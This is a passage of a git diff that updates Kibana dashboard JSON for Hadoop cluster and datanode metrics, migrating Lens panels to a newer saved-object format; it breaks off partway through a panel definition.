+ "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - "visualization": { - "accessor": "2c8412e8-db24-4dab-8635-32a74ef1873c", - "layerId": "570e3d96-2c27-4661-8669-77215711bb6e", - "layerType": "data", - "size": "xl", - "textAlign": "center", - "titlePosition": "bottom" - } + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.datanode.bytes.written" + }, + "797ebde1-9d7b-4950-9554-194d5c702684": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "fc0da319-4b72-4ccc-8e27-2c4ebec508c7": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of service.address", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" + }, + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "service.address" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "fbe5ed56-727a-408f-ab58-b03abf1502da", + "key": "hadoop.datanode.bytes.read", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.datanode.bytes.read" + } + } }, - "gridData": { - "h": 7, - "i": "f03b0b45-577e-480e-9fb2-9890b62fc30f", - "w": 12, - "x": 36, - "y": 7 + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "37000496-671a-41ab-ab7b-35823e718530", + "key": "hadoop.datanode.bytes.written", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.datanode.bytes.written" + } + } + } + ], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"hadoop.datanode\" " + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "f03b0b45-577e-480e-9fb2-9890b62fc30f", - "title": "Number of data nodes decommissioning [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 15, - "i": "eed75d07-d50d-4fd8-ad03-6cf7bd5bd42f", - "w": 24, - "x": 0, - "y": 12 + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "panelIndex": "eed75d07-d50d-4fd8-ad03-6cf7bd5bd42f", - "panelRefName": "panel_eed75d07-d50d-4fd8-ad03-6cf7bd5bd42f", - "title": "Number of bytes read and written [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true + "layers": [ + { + "accessors": [ + "4b9fcd50-2227-40e5-a93b-ebb16831630d", + "56fd6e61-acf3-45e6-9904-98f7ffa90644" + ], + "layerId": "69af342c-71f3-41fe-a76e-cc9f49baafa3", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "fc0da319-4b72-4ccc-8e27-2c4ebec508c7", + "xAccessor": "797ebde1-9d7b-4950-9554-194d5c702684" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" }, - "gridData": { - "h": 6, - "i": "ed24ad58-0d8a-495f-9767-1d994d65d52f", - "w": 24, - "x": 24, - "y": 14 + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "ed24ad58-0d8a-495f-9767-1d994d65d52f", - "panelRefName": "panel_ed24ad58-0d8a-495f-9767-1d994d65d52f", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true + "valueLabels": "hide", + "xTitle": "Timestamp", + "yLeftExtent": { + "mode": "full" }, - "gridData": { - "h": 7, - "i": "21f37466-b62d-4219-bc1a-d787833a8dbf", - "w": 12, - "x": 24, - "y": 20 + "yRightExtent": { + "mode": "full" }, - "panelIndex": "21f37466-b62d-4219-bc1a-d787833a8dbf", - "panelRefName": "panel_21f37466-b62d-4219-bc1a-d787833a8dbf", - "type": "lens", - "version": "8.3.0" + "yTitle": "Bytes" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 7, - "i": "da4e4113-6794-4a85-977c-51879f500a0a", - "w": 12, - "x": 36, - "y": 20 - }, - "panelIndex": "da4e4113-6794-4a85-977c-51879f500a0a", - "panelRefName": "panel_da4e4113-6794-4a85-977c-51879f500a0a", - "type": "lens", - "version": "8.3.0" - } - ], - "timeRestore": false, - "title": "[Metrics Hadoop] Data nodes", - "version": 1 - }, - "coreMigrationVersion": "8.3.0", - "id": "hadoop-c06fb680-cf76-11ec-bc3e-6faca2b11df2", - "migrationVersion": { - "dashboard": "8.3.0" - }, - "references": [ - { - "id": "hadoop-c4e16fe0-cf73-11ec-bc3e-6faca2b11df2", - "name": "1f52942c-5657-4bab-8e38-5cf69692f448:panel_1f52942c-5657-4bab-8e38-5cf69692f448", - "type": "lens" - }, - { - "id": "metrics-*", - "name": "eac20ac9-93ca-483c-ab27-d10a06f4dde0:indexpattern-datasource-layer-df057b77-cd5b-4e7a-bb21-ac003f0f4eb8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "eac20ac9-93ca-483c-ab27-d10a06f4dde0:50b51ba8-f87e-405f-8a53-efea43df987b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "75574416-a16d-43be-a303-2dc31359a8c9:indexpattern-datasource-layer-3d40213c-fe67-4c30-bde1-5450fbadcd20", - "type": "index-pattern" + "title": "Number of bytes read and written [Hadoop Metrics]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-69af342c-71f3-41fe-a76e-cc9f49baafa3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "fbe5ed56-727a-408f-ab58-b03abf1502da", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "37000496-671a-41ab-ab7b-35823e718530", + "type": "index-pattern" + } + ] + } }, - { - "id": "metrics-*", - "name": "75574416-a16d-43be-a303-2dc31359a8c9:0fdf9d17-fb31-40a8-b8db-02850b080c9d", - "type": "index-pattern" + "gridData": { + "h": 15, + "i": "eed75d07-d50d-4fd8-ad03-6cf7bd5bd42f", + "w": 24, + "x": 0, + "y": 12 }, - { - "id": "hadoop-73f3b470-cf74-11ec-bc3e-6faca2b11df2", - "name": "c8a6b036-ae93-4055-aef7-dd575221f10d:panel_c8a6b036-ae93-4055-aef7-dd575221f10d", - "type": "lens" + "panelIndex": "eed75d07-d50d-4fd8-ad03-6cf7bd5bd42f", + "title": "Number of bytes read and written [Metrics Hadoop]", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "bfc4ee7d-e67a-492c-a0de-3ba41b193e52": { + "columnOrder": [ + "f5aa20c5-3dfb-45e8-82ff-4a24d054ef62", + "f5aa20c5-3dfb-45e8-82ff-4a24d054ef62X0" + ], + "columns": { + "f5aa20c5-3dfb-45e8-82ff-4a24d054ef62": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Disk Capacity", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "formula": "median(hadoop.datanode.disk_space.capacity)", + "isFormulaBroken": false + }, + "references": [ + "f5aa20c5-3dfb-45e8-82ff-4a24d054ef62X0" + ], + "scale": "ratio" + }, + "f5aa20c5-3dfb-45e8-82ff-4a24d054ef62X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Disk Capacity (GB)", + "operationType": "median", + "scale": "ratio", + "sourceField": "hadoop.datanode.disk_space.capacity" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "87fdb03b-29d6-48a3-952a-da13b704e34a", + "key": "hadoop.datanode.disk_space.capacity", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.datanode.disk_space.capacity" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "f5aa20c5-3dfb-45e8-82ff-4a24d054ef62", + "layerId": "bfc4ee7d-e67a-492c-a0de-3ba41b193e52", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "Data node disk capacity [Metrics Hadoop]", + "visualizationType": "lnsLegacyMetric", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-bfc4ee7d-e67a-492c-a0de-3ba41b193e52", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "87fdb03b-29d6-48a3-952a-da13b704e34a", + "type": "index-pattern" + } + ] + } }, - { - "id": "metrics-*", - "name": "f03b0b45-577e-480e-9fb2-9890b62fc30f:indexpattern-datasource-layer-570e3d96-2c27-4661-8669-77215711bb6e", - "type": "index-pattern" + "gridData": { + "h": 6, + "i": "ed24ad58-0d8a-495f-9767-1d994d65d52f", + "w": 24, + "x": 24, + "y": 14 }, - { - "id": "metrics-*", - "name": "f03b0b45-577e-480e-9fb2-9890b62fc30f:4e3e29b3-cd97-447c-b679-0130844d95bb", - "type": "index-pattern" + "panelIndex": "ed24ad58-0d8a-495f-9767-1d994d65d52f", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "attributes": { + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "011f4580-0ed6-43f2-aeb7-64965ecd5e83": { + "columnOrder": [ + "7fd9ea12-b127-443d-a3d9-a07be9982c13" + ], + "columns": { + "7fd9ea12-b127-443d-a3d9-a07be9982c13": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Failed volumes", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.datanode.volumes.failed" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "hadoop.datanode.volumes.failed : * " + }, + "visualization": { + "accessor": "7fd9ea12-b127-443d-a3d9-a07be9982c13", + "layerId": "011f4580-0ed6-43f2-aeb7-64965ecd5e83", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "Failed Volumes [Metrics Hadoop]", + "visualizationType": "lnsLegacyMetric", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-011f4580-0ed6-43f2-aeb7-64965ecd5e83", + "type": "index-pattern" + } + ] + } }, - { - "id": "hadoop-09305b10-cf75-11ec-bc3e-6faca2b11df2", - "name": "eed75d07-d50d-4fd8-ad03-6cf7bd5bd42f:panel_eed75d07-d50d-4fd8-ad03-6cf7bd5bd42f", - "type": "lens" + "gridData": { + "h": 7, + "i": "21f37466-b62d-4219-bc1a-d787833a8dbf", + "w": 12, + "x": 24, + "y": 20 }, - { - "id": "hadoop-2132d820-cd2f-11ec-be30-1d9331f0b107", - "name": "ed24ad58-0d8a-495f-9767-1d994d65d52f:panel_ed24ad58-0d8a-495f-9767-1d994d65d52f", - "type": "lens" + "panelIndex": "21f37466-b62d-4219-bc1a-d787833a8dbf", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "781bec53-7762-43ba-bc46-4a54c6b985ae": { + "columnOrder": [ + "931e5379-b427-4096-8030-51a9ad546b02" + ], + "columns": { + "931e5379-b427-4096-8030-51a9ad546b02": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Cached blocks", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.datanode.blocks.cached" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "hadoop.datanode.blocks.cached : * " + }, + "visualization": { + "accessor": "931e5379-b427-4096-8030-51a9ad546b02", + "layerId": "781bec53-7762-43ba-bc46-4a54c6b985ae", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "Cached blocks [Metrics Hadoop]", + "visualizationType": "lnsLegacyMetric", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-781bec53-7762-43ba-bc46-4a54c6b985ae", + "type": "index-pattern" + } + ] + } }, - { - "id": "hadoop-ace7b680-cf76-11ec-bc3e-6faca2b11df2", - "name": "21f37466-b62d-4219-bc1a-d787833a8dbf:panel_21f37466-b62d-4219-bc1a-d787833a8dbf", - "type": "lens" + "gridData": { + "h": 7, + "i": "da4e4113-6794-4a85-977c-51879f500a0a", + "w": 12, + "x": 36, + "y": 20 }, - { - "id": "hadoop-a6a8b400-cf75-11ec-bc3e-6faca2b11df2", - "name": "da4e4113-6794-4a85-977c-51879f500a0a:panel_da4e4113-6794-4a85-977c-51879f500a0a", - "type": "lens" - } + "panelIndex": "da4e4113-6794-4a85-977c-51879f500a0a", + "type": "lens", + "version": "8.6.0" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics Hadoop] Data nodes", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "eac20ac9-93ca-483c-ab27-d10a06f4dde0:indexpattern-datasource-layer-df057b77-cd5b-4e7a-bb21-ac003f0f4eb8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "eac20ac9-93ca-483c-ab27-d10a06f4dde0:50b51ba8-f87e-405f-8a53-efea43df987b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "75574416-a16d-43be-a303-2dc31359a8c9:indexpattern-datasource-layer-3d40213c-fe67-4c30-bde1-5450fbadcd20", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "75574416-a16d-43be-a303-2dc31359a8c9:0fdf9d17-fb31-40a8-b8db-02850b080c9d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f03b0b45-577e-480e-9fb2-9890b62fc30f:indexpattern-datasource-layer-570e3d96-2c27-4661-8669-77215711bb6e", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f03b0b45-577e-480e-9fb2-9890b62fc30f:4e3e29b3-cd97-447c-b679-0130844d95bb", + "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "1f52942c-5657-4bab-8e38-5cf69692f448:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "1f52942c-5657-4bab-8e38-5cf69692f448:indexpattern-datasource-layer-ee57a119-2827-4586-82f1-c796c86d76d9", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "c8a6b036-ae93-4055-aef7-dd575221f10d:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "c8a6b036-ae93-4055-aef7-dd575221f10d:indexpattern-datasource-layer-efa00ae4-03e1-45c9-aaa9-47610de989d9", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "eed75d07-d50d-4fd8-ad03-6cf7bd5bd42f:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "eed75d07-d50d-4fd8-ad03-6cf7bd5bd42f:indexpattern-datasource-layer-69af342c-71f3-41fe-a76e-cc9f49baafa3", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "eed75d07-d50d-4fd8-ad03-6cf7bd5bd42f:fbe5ed56-727a-408f-ab58-b03abf1502da", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "eed75d07-d50d-4fd8-ad03-6cf7bd5bd42f:37000496-671a-41ab-ab7b-35823e718530", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "ed24ad58-0d8a-495f-9767-1d994d65d52f:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "ed24ad58-0d8a-495f-9767-1d994d65d52f:indexpattern-datasource-layer-bfc4ee7d-e67a-492c-a0de-3ba41b193e52", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "ed24ad58-0d8a-495f-9767-1d994d65d52f:87fdb03b-29d6-48a3-952a-da13b704e34a", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "21f37466-b62d-4219-bc1a-d787833a8dbf:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "21f37466-b62d-4219-bc1a-d787833a8dbf:indexpattern-datasource-layer-011f4580-0ed6-43f2-aeb7-64965ecd5e83", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "da4e4113-6794-4a85-977c-51879f500a0a:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "da4e4113-6794-4a85-977c-51879f500a0a:indexpattern-datasource-layer-781bec53-7762-43ba-bc46-4a54c6b985ae", + "id": "metrics-*" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/hadoop/kibana/dashboard/hadoop-cb235590-cd24-11ec-be30-1d9331f0b107.json b/packages/hadoop/kibana/dashboard/hadoop-cb235590-cd24-11ec-be30-1d9331f0b107.json index e4837902fbb..846835b3541 100644 --- a/packages/hadoop/kibana/dashboard/hadoop-cb235590-cd24-11ec-be30-1d9331f0b107.json +++ b/packages/hadoop/kibana/dashboard/hadoop-cb235590-cd24-11ec-be30-1d9331f0b107.json @@ -1,1279 +1,1295 @@ { - "attributes": { - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "id": "hadoop-cb235590-cd24-11ec-be30-1d9331f0b107", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T17:16:59.199Z", + "created_at": "2023-11-07T17:16:59.199Z", + "version": "WzEwMiwxXQ==", + "attributes": { + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 18, + "i": "08fde296-94c6-4dbd-bd1f-77c67e0125e6", + "w": 24, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-35726819-8a70-4f5e-b150-1626c191f380", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "4b01387d-bd18-4e16-b860-005e4a71e957", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d846e0a6-42a9-4840-82e4-f217959a63fb", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c50d822a-587a-4198-90c1-847fe7355fa1", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e78473e3-a006-46cf-bada-e75ab9c4b279", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "35726819-8a70-4f5e-b150-1626c191f380": { - "columnOrder": [ - "c4649608-0cba-486f-8aec-460655407f67", - "39e015f6-e8f8-4a9a-80e3-2570606d310c", - "09a20c96-905b-40c8-9c40-77bfb5edb5b7", - "3708838a-0567-4295-8e77-3a39aca246cd", - "02f59eb1-8c13-41d6-a537-58fb1f051f84" - ], - "columns": { - "02f59eb1-8c13-41d6-a537-58fb1f051f84": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.node_managers.num_lost: *" - }, - "isBucketed": false, - "label": "Lost", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.node_managers.num_lost" - }, - "09a20c96-905b-40c8-9c40-77bfb5edb5b7": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.node_managers.num_unhealthy: *" - }, - "isBucketed": false, - "label": "Unhealthy", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.node_managers.num_unhealthy" - }, - "3708838a-0567-4295-8e77-3a39aca246cd": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.node_managers.num_decommissioned: *" - }, - "isBucketed": false, - "label": "Decommissioned", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.node_managers.num_decommissioned" - }, - "39e015f6-e8f8-4a9a-80e3-2570606d310c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.node_managers.num_active: *" - }, - "isBucketed": false, - "label": "Active", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.node_managers.num_active" - }, - "c4649608-0cba-486f-8aec-460655407f67": { - "customLabel": true, - "dataType": "date", - "isBucketed": true, - "label": "Timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "4b01387d-bd18-4e16-b860-005e4a71e957", - "key": "hadoop.cluster.node_managers.num_active", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.node_managers.num_active" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "d846e0a6-42a9-4840-82e4-f217959a63fb", - "key": "hadoop.cluster.node_managers.num_unhealthy", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.node_managers.num_unhealthy" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "c50d822a-587a-4198-90c1-847fe7355fa1", - "key": "hadoop.cluster.node_managers.num_decommissioned", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.node_managers.num_decommissioned" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "e78473e3-a006-46cf-bada-e75ab9c4b279", - "key": "hadoop.cluster.node_managers.num_lost", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.node_managers.num_lost" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "39e015f6-e8f8-4a9a-80e3-2570606d310c", - "09a20c96-905b-40c8-9c40-77bfb5edb5b7", - "3708838a-0567-4295-8e77-3a39aca246cd", - "02f59eb1-8c13-41d6-a537-58fb1f051f84" - ], - "layerId": "35726819-8a70-4f5e-b150-1626c191f380", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "xAccessor": "c4649608-0cba-486f-8aec-460655407f67", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "39e015f6-e8f8-4a9a-80e3-2570606d310c" - }, - { - "axisMode": "left", - "forAccessor": "09a20c96-905b-40c8-9c40-77bfb5edb5b7" - }, - { - "axisMode": "left", - "forAccessor": "3708838a-0567-4295-8e77-3a39aca246cd" - }, - { - "axisMode": "left", - "forAccessor": "02f59eb1-8c13-41d6-a537-58fb1f051f84" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "top", - "showSingleSeries": true - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "xTitle": "Timestamp", - "yTitle": "Node Managers" - } + "panelIndex": "08fde296-94c6-4dbd-bd1f-77c67e0125e6", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-35726819-8a70-4f5e-b150-1626c191f380", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "4b01387d-bd18-4e16-b860-005e4a71e957", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d846e0a6-42a9-4840-82e4-f217959a63fb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c50d822a-587a-4198-90c1-847fe7355fa1", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e78473e3-a006-46cf-bada-e75ab9c4b279", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "35726819-8a70-4f5e-b150-1626c191f380": { + "columnOrder": [ + "c4649608-0cba-486f-8aec-460655407f67", + "39e015f6-e8f8-4a9a-80e3-2570606d310c", + "09a20c96-905b-40c8-9c40-77bfb5edb5b7", + "3708838a-0567-4295-8e77-3a39aca246cd", + "02f59eb1-8c13-41d6-a537-58fb1f051f84" + ], + "columns": { + "02f59eb1-8c13-41d6-a537-58fb1f051f84": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.node_managers.num_lost: *" + }, + "isBucketed": false, + "label": "Lost", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.node_managers.num_lost" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 18, - "i": "08fde296-94c6-4dbd-bd1f-77c67e0125e6", - "w": 24, - "x": 0, - "y": 0 - }, - "panelIndex": "08fde296-94c6-4dbd-bd1f-77c67e0125e6", - "title": "Number of node managers over time [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "b880f665-29b3-40b9-bd45-459f3105c645", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "5199984c-035a-4e47-9d4a-d63d01735d8b": { - "columnOrder": [ - "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04" - ], - "columns": { - "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.cluster.nodes.active: *" - }, - "isBucketed": false, - "label": "Active Nodes", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.cluster.nodes.active" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "b880f665-29b3-40b9-bd45-459f3105c645", - "key": "hadoop.cluster.nodes.active", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.cluster.nodes.active" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04", - "layerId": "5199984c-035a-4e47-9d4a-d63d01735d8b", - "layerType": "data", - "size": "xxl", - "textAlign": "center", - "titlePosition": "bottom" - } + "09a20c96-905b-40c8-9c40-77bfb5edb5b7": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.node_managers.num_unhealthy: *" + }, + "isBucketed": false, + "label": "Unhealthy", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.node_managers.num_unhealthy" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 5, - "i": "e4ced3fd-72aa-4091-95cf-39d49d5bb17f", - "w": 8, - "x": 24, - "y": 0 - }, - "panelIndex": "e4ced3fd-72aa-4091-95cf-39d49d5bb17f", - "title": "Number of active nodes [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": 